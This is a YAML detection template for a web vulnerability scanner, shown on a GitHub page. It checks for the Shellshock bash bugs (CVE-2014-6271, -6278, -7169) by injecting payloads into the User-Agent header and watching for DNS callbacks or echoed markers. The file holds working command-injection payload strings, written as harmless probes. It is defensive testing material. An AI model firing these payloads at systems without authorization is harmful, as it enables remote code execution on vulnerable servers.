-
Notifications
You must be signed in to change notification settings - Fork 10
/
Copy pathshellshock.yaml
38 lines (34 loc) · 1.11 KB
/
shellshock.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#Attention! For this DSL detect you must use a custom test policy with HEADER_* insertion point!
collect:
- uniq:
- [URI]
generate:
- into: HEADER_USER-AGENT
- method:
- replace
- payload:
#CVE 2014-6271
- "() { :; }; echo; PATH=/usr/bin:/usr/local/bin:/bin; export PATH ;bash -c 'getent hosts DNS_MARKER'"
- "() { :; }; echo; echo $((CALC_MARKER))"
#CVE-2014-6278
- "() { _; } >_[$($())] { echo; PATH=/usr/bin:/usr/local/bin:/bin; bash -c 'getent hosts DNS_MARKER'; }"
- "() { _; } >_[$($())] { echo; echo $((CALC_MARKER)); }"
#CVE-2014-7169
- "() { (a)=>' echo -e \"Content-Type: text/plain\n\"; echo $((CALC_MARKER))"
detect:
- oob:
- dns
- response:
- body: CALC_MARKER
- headers: CALC_MARKER
meta-info:
- title: "Bash remote code execution vulnerability (ShellShock, CVE-2014-6271, CVE-2014-6278, CVE-2014-7169)"
- type: "rce"
- threat: 100
- description: "This vulnerability allows remote attackers to execute arbitrary code via a crafted environment"
- tags:
- Bashdoor
- shellshock
- CVE 2014-6271
- CVE-2014-6278
- CVE-2014-7169